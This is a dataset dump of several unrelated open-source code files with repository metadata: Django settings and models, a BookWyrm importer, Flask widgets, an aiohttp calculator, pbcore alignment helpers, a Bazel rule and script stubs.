73956be079ddebb8d05372c926665d62e5b38c15 | 4,871 | py | Python | settings/production_settings.py | paulgirmes/P13 | 6129d4639a3d190631c5548c7c6f1c5a53e13161 | [
"MIT"
] | null | null | null | settings/production_settings.py | paulgirmes/P13 | 6129d4639a3d190631c5548c7c6f1c5a53e13161 | [
"MIT"
] | 1 | 2022-03-12T00:49:28.000Z | 2022-03-12T00:49:28.000Z | settings/production_settings.py | paulgirmes/P13 | 6129d4639a3d190631c5548c7c6f1c5a53e13161 | [
"MIT"
] | null | null | null | """
Django settings for CC_ERP project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import json
import os
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from google.oauth2 import service_account
import django_heroku
sentry_sdk.init(
    dsn=os.environ.get("SENTRY_DSN"),
    integrations=[DjangoIntegration()],
    traces_sample_rate=1.0,
    # If you wish to associate users to errors (assuming you are using
    # django.contrib.auth) you may enable sending PII data.
    send_default_pii=True
)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = [".herokuapp.com", "localhost", "127.0.0.1"]
# settings for email sending : smtp server...
EMAIL_BACKEND = "django.core.mail.backends.smtp.EmailBackend"
EMAIL_HOST = "smtp.gmail.com"
EMAIL_PORT = 587
EMAIL_HOST_USER = os.environ.get("EMAIL_HOST_USER")
EMAIL_HOST_PASSWORD = os.environ.get("EMAIL_HOST_PASSWORD")
EMAIL_USE_TLS = True
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    "debug_toolbar",
    "frontpage.apps.FrontpageConfig",
    "auth_access_admin.apps.AuthAccessAdminConfig",
    "day_to_day.apps.DayToDayConfig",
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    "debug_toolbar.middleware.DebugToolbarMiddleware",
]
ROOT_URLCONF = 'CC_ERP.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'CC_ERP.wsgi.application'
# custom usermodel
AUTH_USER_MODEL = 'frontpage.User'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "fr-fr"
TIME_ZONE = "Europe/Paris"
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATIC_URL = '/static/'
STATICFILES_DIR = {
    os.path.join(BASE_DIR, "static"),
}
# serving media files through google storage
DEFAULT_FILE_STORAGE = 'storages.backends.gcloud.GoogleCloudStorage'
GS_BUCKET_NAME = "child-care-erp"
GS_PROJECT_ID = "p11oc-283117"
MEDIA_URL = 'https://storage.cloud.google.com/{}/'.format(GS_BUCKET_NAME)
MEDIA_ROOT = "media/"
try:
    with open("app/google-credentials.json") as f:
        pass
    GS_CREDENTIALS = service_account.Credentials.from_service_account_file(
        os.environ.get("GOOGLE_APPLICATION_CREDENTIALS")
    )
except FileNotFoundError:
    GS_CREDENTIALS = None
# debug toolbar specific setting
INTERNAL_IPS = ["127.0.0.1"]
# app custom settings
LOGIN_REDIRECT_URL = "/auth/index/"
STRUCTURE = os.environ.get("STRUCTURE")
ACTIVITIES_CHOICES = [
    ("MF", "Motricité Fine"),
    ("M", "Motricité"),
    ("SP", "Sport")
]
# security settings to prevent session cookies
# and csrf token to leak while http only
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
# Heroku deployment helper (set secret key, whitenoise,
# DB... with env.variables specs.)
django_heroku.settings(locals(), allowed_hosts=False)
| 27.676136 | 91 | 0.724081 | 582 | 4,871 | 5.898625 | 0.427835 | 0.060588 | 0.039616 | 0.036411 | 0.136615 | 0.100204 | 0.054763 | 0.054763 | 0.023303 | 0 | 0 | 0.010922 | 0.154178 | 4,871 | 175 | 92 | 27.834286 | 0.82233 | 0.246151 | 0 | 0 | 1 | 0 | 0.450178 | 0.340379 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.06422 | 0.055046 | 0 | 0.055046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
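The try/except near the end of the settings file above probes for a local credentials file before loading service-account credentials, and falls back to None when it is absent. The pattern in isolation (the dict is a stand-in for the real service_account.Credentials object):

```python
import tempfile

def load_credentials(path):
    # Open the file only to confirm it exists, as the settings module does,
    # then hand back a placeholder "credentials" object.
    try:
        with open(path) as f:
            pass
        return {"source": path}  # stand-in for service_account.Credentials
    except FileNotFoundError:
        return None

print(load_credentials("/nonexistent/google-credentials.json"))  # None

with tempfile.NamedTemporaryFile() as tmp:
    print(load_credentials(tmp.name) is not None)  # True
```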
7395e2f7b730555819cd20214bca377a1d762cca | 892 | py | Python | bookwyrm/importers/calibre_import.py | mouse-reeve/fedireads | e3471fcc3500747a1b1deaaca662021aae5b08d4 | [
"CC0-1.0"
] | 270 | 2020-01-27T06:06:07.000Z | 2020-06-21T00:28:18.000Z | bookwyrm/importers/calibre_import.py | mouse-reeve/fedireads | e3471fcc3500747a1b1deaaca662021aae5b08d4 | [
"CC0-1.0"
] | 158 | 2020-02-10T20:36:54.000Z | 2020-06-26T17:12:54.000Z | bookwyrm/importers/calibre_import.py | mouse-reeve/fedireads | e3471fcc3500747a1b1deaaca662021aae5b08d4 | [
"CC0-1.0"
] | 15 | 2020-02-13T21:53:33.000Z | 2020-06-17T16:52:46.000Z | """ handle reading a csv from calibre """
from bookwyrm.models import Shelf
from . import Importer
class CalibreImporter(Importer):
    """csv downloads from Calibre"""

    service = "Calibre"

    def __init__(self, *args, **kwargs):
        # Add timestamp to row_mappings_guesses for date_added to avoid
        # integrity error
        row_mappings_guesses = []
        for field, mapping in self.row_mappings_guesses:
            if field in ("date_added",):
                row_mappings_guesses.append((field, mapping + ["timestamp"]))
            else:
                row_mappings_guesses.append((field, mapping))
        self.row_mappings_guesses = row_mappings_guesses
        super().__init__(*args, **kwargs)

    def get_shelf(self, normalized_row):
        # Calibre export does not indicate which shelf to use. Go with a default one for now
        return Shelf.TO_READ
| 30.758621 | 92 | 0.653587 | 108 | 892 | 5.148148 | 0.5 | 0.138489 | 0.226619 | 0.07554 | 0.129496 | 0.129496 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258969 | 892 | 28 | 93 | 31.857143 | 0.84115 | 0.25 | 0 | 0 | 0 | 0 | 0.039695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0.066667 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
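CalibreImporter.__init__ above rewrites the inherited row_mappings_guesses so the date_added guess also matches a Calibre 'timestamp' column. The transformation in isolation, with illustrative guesses (BookWyrm's real defaults live on the Importer base class and are not shown here):

```python
# Illustrative guesses; not BookWyrm's actual defaults.
row_mappings_guesses = [
    ("title", ["title"]),
    ("date_added", ["date added", "entry date"]),
]

adjusted = [
    (field, mapping + ["timestamp"]) if field == "date_added" else (field, mapping)
    for field, mapping in row_mappings_guesses
]

print(adjusted[1])  # ('date_added', ['date added', 'entry date', 'timestamp'])
```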
73a09d032092ab2c9601de37cc36a19d7eec74a9 | 3,366 | py | Python | app/widgets.py | sintax1/beaconlp | 2cf42d0da445d2d1edf08b06e8da9140ff10f307 | [
"MIT"
] | null | null | null | app/widgets.py | sintax1/beaconlp | 2cf42d0da445d2d1edf08b06e8da9140ff10f307 | [
"MIT"
] | 4 | 2016-02-26T22:34:44.000Z | 2016-03-01T03:37:25.000Z | app/widgets.py | sintax1/beaconlp | 2cf42d0da445d2d1edf08b06e8da9140ff10f307 | [
"MIT"
] | null | null | null | from flask.globals import _request_ctx_stack
import json
class FilterBuilderWidget(object):
"""
Filter Builder Form Widget
"""
template = '/widgets/filterbuilder.html'
template_args = None
beacon_filters = []
beacon_fields = []
def __init__(self, **kwargs):
if 'beacon_filters' not in kwargs:
kwargs['beacon_filters'] = self.beacon_filters
if 'beacon_fields' not in kwargs:
kwargs['beacon_fields'] = self.beacon_fields
self.template_args = kwargs
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
kwargs.setdefault('name', field.name)
if field.data:
kwargs['filter_rules'] = "rules: %s" % field.data
ctx = _request_ctx_stack.top
jinja_env = ctx.app.jinja_env
template = jinja_env.get_template(self.template)
args = self.template_args.copy()
args.update(kwargs)
return template.render(args)
class BeaconFieldsWidget(object):
"""
Beacon Fields Form Widget
"""
template = '/widgets/beaconfields.html'
template_args = None
beacon_fields = []
packet_fields = []
data_mapping = (
('Raw.load', 'type'),
('Raw.load', 'uuid'),
('Raw.load', 'data_length'),
('Raw.load', 'data'),
)
def __init__(self, **kwargs):
if 'beacon_fields' not in kwargs:
kwargs['beacon_fields'] = self.beacon_fields
if 'packet_fields' not in kwargs:
kwargs['packet_fields'] = self.packet_fields
if 'data_mapping' not in kwargs:
kwargs['data_mapping'] = self.data_mapping
self.template_args = kwargs
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
kwargs.setdefault('name', field.name)
kwargs.setdefault('data_mapping', self.data_mapping)
if field.data:
kwargs['data_mapping'] = json.loads(field.data)
ctx = _request_ctx_stack.top
jinja_env = ctx.app.jinja_env
template = jinja_env.get_template(self.template)
args = self.template_args.copy()
args.update(kwargs)
return template.render(args)
class ResponseFieldsWidget(object):
"""
Form widget for message response format
"""
template = '/widgets/responsefields.html'
template_args = None
packet_fields = []
response_fields = []
data_mapping = (
('Raw.load', 'type'),
('Raw.load', 'data_length'),
('Raw.load', 'data')
)
def __init__(self, **kwargs):
if 'response_fields' not in kwargs:
kwargs['response_fields'] = self.response_fields
if 'packet_fields' not in kwargs:
kwargs['packet_fields'] = self.packet_fields
if 'data_mapping' not in kwargs:
kwargs['data_mapping'] = self.data_mapping
self.template_args = kwargs
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
kwargs.setdefault('name', field.name)
kwargs.setdefault('data_mapping', self.data_mapping)
ctx = _request_ctx_stack.top
jinja_env = ctx.app.jinja_env
template = jinja_env.get_template(self.template)
args = self.template_args.copy()
args.update(kwargs)
return template.render(args)
| 28.05 | 61 | 0.616162 | 381 | 3,366 | 5.188976 | 0.167979 | 0.072332 | 0.072838 | 0.068791 | 0.746586 | 0.697016 | 0.68437 | 0.68437 | 0.652504 | 0.652504 | 0 | 0 | 0.266488 | 3,366 | 119 | 62 | 28.285714 | 0.800729 | 0.027332 | 0 | 0.746988 | 0 | 0 | 0.143831 | 0.025108 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072289 | false | 0 | 0.024096 | 0 | 0.337349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73a5419fd10b78f7c83c2071f2e423d27e6ab0b9 | 654 | py | Python | chapter08/packt-calc/packt_calc/calc.py | PacktPublishing/Migrating-from-Python-2-to-Python-3 | 1cb70b7fce12fe11bc2a25a86cbe3281d544f81d | [
"MIT"
] | null | null | null | chapter08/packt-calc/packt_calc/calc.py | PacktPublishing/Migrating-from-Python-2-to-Python-3 | 1cb70b7fce12fe11bc2a25a86cbe3281d544f81d | [
"MIT"
] | null | null | null | chapter08/packt-calc/packt_calc/calc.py | PacktPublishing/Migrating-from-Python-2-to-Python-3 | 1cb70b7fce12fe11bc2a25a86cbe3281d544f81d | [
"MIT"
] | null | null | null | from aiohttp import web
def add(op1, op2):
return op1 + op2
def sub(op1, op2):
return op1 - op2
async def add_handler(request):
    result = add(int(request.match_info['op1']),
int(request.match_info['op2']))
return web.Response(text="{}".format(result))
async def sub_handler(request):
result = sub(int(request.match_info['op1']),
int(request.match_info['op2']))
return web.Response(text="{}".format(result))
def start_server():
app = web.Application()
    app.add_routes([web.get('/add/{op1}/{op2}', add_handler)])
    app.add_routes([web.get('/sub/{op1}/{op2}', sub_handler)])
web.run_app(app)
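The handlers above read `op1`/`op2` as strings from `request.match_info`, convert them to integers, and format the result into the response body. A server-free sketch of that flow, using a plain dict in place of aiohttp's `match_info` (an assumption for illustration, not part of the original module):

```python
def add(op1, op2):
    return op1 + op2

def handle(match_info, op):
    # mirrors add_handler/sub_handler: parse string path params, compute, format
    return "{}".format(op(int(match_info['op1']), int(match_info['op2'])))

print(handle({'op1': '2', 'op2': '3'}, add))  # prints: 5
```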
| 22.551724 | 54 | 0.616208 | 92 | 654 | 4.271739 | 0.293478 | 0.091603 | 0.152672 | 0.193384 | 0.575064 | 0.391858 | 0.391858 | 0.391858 | 0.391858 | 0.391858 | 0 | 0.030593 | 0.200306 | 654 | 28 | 55 | 23.357143 | 0.720841 | 0 | 0 | 0.222222 | 0 | 0 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.055556 | 0.111111 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
73ab35bc8a4538528d0ef6dc229df5b1c965c9fb | 5,931 | py | Python | pbcore/io/align/_AlignmentMixin.py | yoshihikosuzuki/pbcore | 956c45dea8868b5cf7d9b8e9ce98ac8fe8a60150 | [
"BSD-3-Clause"
] | null | null | null | pbcore/io/align/_AlignmentMixin.py | yoshihikosuzuki/pbcore | 956c45dea8868b5cf7d9b8e9ce98ac8fe8a60150 | [
"BSD-3-Clause"
] | null | null | null | pbcore/io/align/_AlignmentMixin.py | yoshihikosuzuki/pbcore | 956c45dea8868b5cf7d9b8e9ce98ac8fe8a60150 | [
"BSD-3-Clause"
] | null | null | null | # Author: David Alexander
__all__ = [ "AlignmentReaderMixin",
"AlignmentRecordMixin",
"IndexedAlignmentReaderMixin" ]
from pbcore.io import BasH5Collection
import numpy as np
class AlignmentReaderMixin(object):
"""
Mixin class for higher-level functionality of alignment file
readers.
"""
def attach(self, fofnFilename):
"""
Attach the actual movie data files that were used to create this
alignment file.
"""
self.basH5Collection = BasH5Collection(fofnFilename)
@property
def moviesAttached(self):
return (hasattr(self, "basH5Collection") and self.basH5Collection is not None)
class IndexedAlignmentReaderMixin(AlignmentReaderMixin):
"""
Mixin class for alignment readers that have access to an alignment
index.
"""
def readsByName(self, query):
"""
Identifies reads by name query. The name query is interpreted as follows:
- "movieName/holeNumber[/[*]]" => gets all records from a chosen movie, ZMW
- "movieName/holeNumber/rStart_rEnd => gets all records *overlapping* read range query in movie, ZMW
- "movieName/holeNumber/ccs" => gets CCS records from chose movie, ZMW (zero or one)
Records are returned in a list in ascending order of rStart
"""
def rgIDs(movieName):
return self.readGroupTable.ID[self.readGroupTable.MovieName == movieName]
#return self.movieInfoTable.ID[self.movieInfoTable.Name == movieName]
def rangeOverlap(w1, w2):
s1, e1 = w1
s2, e2 = w2
return (e1 > s2) and (e2 > s1)
def rQueryMatch(readName, rQuery):
if rQuery == "*" or rQuery == "":
return True
elif rQuery == "ccs":
return readName.endswith("ccs")
elif readName.endswith("ccs"):
return False
else:
q = list(map(int, rQuery.split("_")))
r = list(map(int, readName.split("/")[-1].split("_")))
return rangeOverlap(q, r)
fields = query.split("/")
movieName = fields[0]
holeNumber = int(fields[1])
if len(fields) > 2: rQuery = fields[2]
else: rQuery = "*"
rgs = rgIDs(movieName)
rns = np.flatnonzero(np.in1d(self.qId, rgs) &
(self.holeNumber == holeNumber))
alns = [ a for a in self[rns]
if rQueryMatch(a.readName, rQuery) ]
return sorted(alns, key=lambda a: a.readStart)
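The query grammar documented above hinges on `rQueryMatch`: `"*"`/empty matches everything, `"ccs"` matches only CCS reads, and a `rStart_rEnd` query matches reads whose range overlaps it. A standalone sketch of that matcher (renamed, and detached from the reader class for illustration):

```python
def r_query_match(read_name, r_query):
    # standalone version of rQueryMatch above
    if r_query in ("*", ""):
        return True
    if r_query == "ccs":
        return read_name.endswith("ccs")
    if read_name.endswith("ccs"):
        return False
    s1, e1 = map(int, r_query.split("_"))
    s2, e2 = map(int, read_name.split("/")[-1].split("_"))
    return (e1 > s2) and (e2 > s1)

print(r_query_match("m1/42/100_200", "150_300"))  # prints: True
```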
def readsByHoleNumber(self, hn):
"""
Identify reads by hole number, for single-movie alignment files.
Raises a ValueError for alignment files that are not single-movie
"""
movieNames = list(self.movieNames)
if len(movieNames) != 1:
raise ValueError("readsByHoleNumber expects a single-movie file")
else:
return self.readsByName(movieNames[0] + "/" + str(hn))
class AlignmentRecordMixin(object):
"""
Mixin class providing some higher-level functionality for
alignment records.
"""
@property
def zmw(self):
if not self.reader.moviesAttached:
raise ValueError("Movies not attached!")
return self.reader.basH5Collection[self.zmwName]
@property
def zmwRead(self):
if not self.reader.moviesAttached:
raise ValueError("Movies not attached!")
return self.reader.basH5Collection[self.readName]
@property
def referenceStart(self):
"""
The left bound of the alignment, in reference coordinates.
"""
return self.tStart
@property
def referenceEnd(self):
"""
The right bound of the alignment, in reference coordinates.
"""
return self.tEnd
@property
def readStart(self):
"""
The left bound of the alignment, in read coordinates (from the BAS.H5 file).
"""
return self.aStart
@property
def readEnd(self):
"""
The right bound of the alignment, in read coordinates (from the BAS.H5 file).
"""
return self.aEnd
@property
def referenceSpan(self):
"""
The length along the reference implied by this alignment.
"""
return self.tEnd - self.tStart
@property
def readLength(self):
"""
The length of the read.
"""
return self.aEnd - self.aStart
def __len__(self):
return self.readLength
@property
def readName(self):
"""
Return the name of the read that was aligned, in standard
PacBio format.
"""
zmwName = self.zmwName
if self.readType == "CCS":
return "%s/ccs" % (zmwName,)
else:
return "%s/%d_%d" % (zmwName, self.aStart, self.aEnd)
@property
def zmwName(self):
return "%s/%d" % (self.movieName, self.HoleNumber)
def spansReferencePosition(self, pos):
"""
Does the alignment span the given reference position?
"""
return self.tStart <= pos < self.tEnd
def spansReferenceRange(self, start, end):
"""
Does the alignment span the given reference range, in its entirety?
"""
assert start <= end
return (self.tStart <= start <= end <= self.tEnd)
def overlapsReferenceRange(self, start, end):
"""
Does the alignment overlap the given reference interval?
"""
assert start <= end
return (self.tStart < end) and (self.tEnd > start)
def containedInReferenceRange(self, start, end):
"""
Is the alignment wholly contained within a given reference interval?
"""
assert start <= end
return (start <= self.tStart <= self.tEnd <= end)
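The three reference-interval predicates above differ only in which endpoints must nest. Standalone versions (a sketch, with `tStart`/`tEnd` passed explicitly instead of read from the alignment record):

```python
def spans(tStart, tEnd, start, end):
    # alignment covers the whole [start, end) query range
    return tStart <= start <= end <= tEnd

def overlaps(tStart, tEnd, start, end):
    # the two half-open intervals intersect
    return (tStart < end) and (tEnd > start)

def contained_in(tStart, tEnd, start, end):
    # alignment lies wholly inside the query range
    return start <= tStart <= tEnd <= end

print(spans(0, 100, 10, 20), overlaps(0, 100, 90, 150), contained_in(10, 20, 0, 100))
# prints: True True True
```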
| 30.260204 | 109 | 0.585399 | 630 | 5,931 | 5.492063 | 0.3 | 0.043353 | 0.011561 | 0.021965 | 0.205202 | 0.205202 | 0.182081 | 0.136416 | 0.123121 | 0.093642 | 0 | 0.007148 | 0.315967 | 5,931 | 195 | 110 | 30.415385 | 0.845699 | 0.272635 | 0 | 0.212121 | 0 | 0 | 0.052876 | 0.006964 | 0 | 0 | 0 | 0 | 0.030303 | 1 | 0.222222 | false | 0 | 0.020202 | 0.040404 | 0.525253 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
73ac4b419ad1dd8d0129acbe189ae556749ed578 | 798 | bzl | Python | third_party/bazel/blade_service_common/blade_service_common_configure.bzl | JamesTheZ/BladeDISC | e6c76ee557ebfccd560d44f6b6276bbc4e0a8a34 | [
"Apache-2.0"
] | null | null | null | third_party/bazel/blade_service_common/blade_service_common_configure.bzl | JamesTheZ/BladeDISC | e6c76ee557ebfccd560d44f6b6276bbc4e0a8a34 | [
"Apache-2.0"
] | null | null | null | third_party/bazel/blade_service_common/blade_service_common_configure.bzl | JamesTheZ/BladeDISC | e6c76ee557ebfccd560d44f6b6276bbc4e0a8a34 | [
"Apache-2.0"
] | null | null | null | load("//bazel:common.bzl", "get_env_bool_value")
_IS_PLATFORM_ALIBABA = "IS_PLATFORM_ALIBABA"
def _blade_service_common_impl(repository_ctx):
if get_env_bool_value(repository_ctx, _IS_PLATFORM_ALIBABA):
repository_ctx.template("blade_service_common_workspace.bzl", Label("//bazel/blade_service_common:blade_service_common_workspace.bzl.tpl"), {
})
else:
repository_ctx.template("blade_service_common_workspace.bzl", Label("//bazel/blade_service_common:blade_service_common_empty_workspace.bzl.tpl"), {
})
repository_ctx.template("BUILD", Label("//bazel/blade_service_common:BUILD.tpl"), {
})
blade_service_common_configure = repository_rule(
implementation = _blade_service_common_impl,
environ = [
_IS_PLATFORM_ALIBABA,
],
)
| 36.272727 | 155 | 0.753133 | 97 | 798 | 5.649485 | 0.298969 | 0.218978 | 0.328467 | 0.14781 | 0.427007 | 0.354015 | 0.354015 | 0.354015 | 0.354015 | 0.354015 | 0 | 0 | 0.134085 | 798 | 21 | 156 | 38 | 0.793054 | 0 | 0 | 0.176471 | 0 | 0 | 0.383459 | 0.308271 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73b7f931ff799d8b824909a4699456882d2f455f | 791 | py | Python | project/explore_anonymize_caida.py | ylavinia/pulearning632 | b4ed5e721aee85c9aa8375bf817e64237f6b298d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | project/explore_anonymize_caida.py | ylavinia/pulearning632 | b4ed5e721aee85c9aa8375bf817e64237f6b298d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | project/explore_anonymize_caida.py | ylavinia/pulearning632 | b4ed5e721aee85c9aa8375bf817e64237f6b298d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | """
Explore datasets and anonymize datasets
Input: original datasets
Output: anonymized datasets
"""
import os, sys, glob
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_recall_fscore_support
from pathlib import Path
from src.utils import get_proj_root
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings("ignore")
random_seed = 222
# anonymize datasets
print(" Anonymize datasets ... ")
def get_prefix_number(num):
"""
Getting the prefix for the new name
e.g, '0' for 12 so it becomes '012'
"""
prefix = '0'
if num < 10:
prefix = '00'
elif num >= 100:
prefix = ''
else:
prefix = '0'
return prefix
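A quick check of the padding behavior (assuming, as the docstring suggests, that the prefix is concatenated with `str(num)` to build three-character names such as `'012'`). The function is repeated here so the snippet runs standalone:

```python
def get_prefix_number(num):
    # same logic as above, duplicated for a self-contained illustration
    if num < 10:
        return '00'
    elif num >= 100:
        return ''
    return '0'

for n in (7, 12, 120):
    print(get_prefix_number(n) + str(n))
# prints: 007, 012, 120 (one per line)
```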
| 15.211538 | 59 | 0.678887 | 102 | 791 | 5.186275 | 0.656863 | 0.096408 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0301 | 0.243995 | 791 | 51 | 60 | 15.509804 | 0.854515 | 0.233881 | 0 | 0.095238 | 0 | 0 | 0.07231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.428571 | 0 | 0.52381 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
73c1459c73a94784db29a01857c43fe58358b046 | 2,201 | py | Python | dataview/models.py | gloryvictory/udata | 1d58e68add7b2f26127360dddbeeb7d24eb6606c | [
"MIT"
] | null | null | null | dataview/models.py | gloryvictory/udata | 1d58e68add7b2f26127360dddbeeb7d24eb6606c | [
"MIT"
] | 6 | 2020-06-05T20:18:38.000Z | 2021-06-04T22:12:17.000Z | dataview/models.py | gloryvictory/udata | 1d58e68add7b2f26127360dddbeeb7d24eb6606c | [
"MIT"
] | null | null | null | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
class UserData(models.Model):
compname = models.CharField(max_length=250) # ZAHARENKOVAAA
disk = models.CharField(max_length=2) # E
folder = models.CharField(max_length=250) # inst\CorelDRAW.Graphics.Suite X7.17.4.0.887.Special.Edition.RePack.by.ALEX\OpenSource\CorelPS2PDF\
is_profile = models.BooleanField() # True if c:\Users etc...
filename_long = models.CharField(max_length=250) # CorelPS2PDF.vcxproj.filters
filename_shot = models.CharField(max_length=250) # CorelPS2PDF
ext_long = models.CharField(max_length=250) # vcxproj.filters
ext_shot = models.CharField(max_length=250) # filters
size = models.BigIntegerField() # 1323
fullname = models.TextField() # E:\inst\CorelDRAW.Graphics.Suite X7.17.4.0.887.Special.Edition.RePack.by.ALEX\OpenSource\CorelPS2PDF\CorelPS2PDF.vcxproj.filters
year = models.IntegerField() # 2019
month = models.IntegerField() # 8
creationtime = models.DateTimeField(auto_now_add=True) # 27.08.2019 16:46:53
fio = models.CharField(max_length=250) # Захаренкова Илона Давыдовна
otdel = models.CharField(max_length=250) # Издательский
textfull = models.TextField() # inst CorelDRAW Graphics Suite X7 17 4 0 887 Special Edition RePack by ALEX OpenSource CorelPS2PDF CorelPS2PDF vcxproj filters
textless = models.TextField() #
lastupdate = models.DateTimeField(auto_now_add=True)
#slug = models.SlugField(max_length=250, unique_for_date='publish')
#publish = models.DateTimeField(default=timezone.now)
#author = models.ForeignKey(User, related_name='blog_posts')
class Meta:
indexes = [
models.Index(fields=['compname', 'folder','fullname',]),
]
    def __str__(self):
        # the model has no ``title`` field; use the stored full path instead
        return self.fullname
73c5be926dc028a29a7817b90743d985c14a4743 | 12,013 | py | Python | tests/ci/osresources.py | varuntiwari27/rally | 948fba0e8fe8214dd3716451d2a52e014a4115be | [
"Apache-2.0"
] | null | null | null | tests/ci/osresources.py | varuntiwari27/rally | 948fba0e8fe8214dd3716451d2a52e014a4115be | [
"Apache-2.0"
] | null | null | null | tests/ci/osresources.py | varuntiwari27/rally | 948fba0e8fe8214dd3716451d2a52e014a4115be | [
"Apache-2.0"
] | null | null | null | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""List and compare most used OpenStack cloud resources."""
import argparse
import json
import subprocess
import sys
from rally.cli import cliutils
from rally.common import objects
from rally.common.plugin import discover
from rally import consts
from rally import osclients
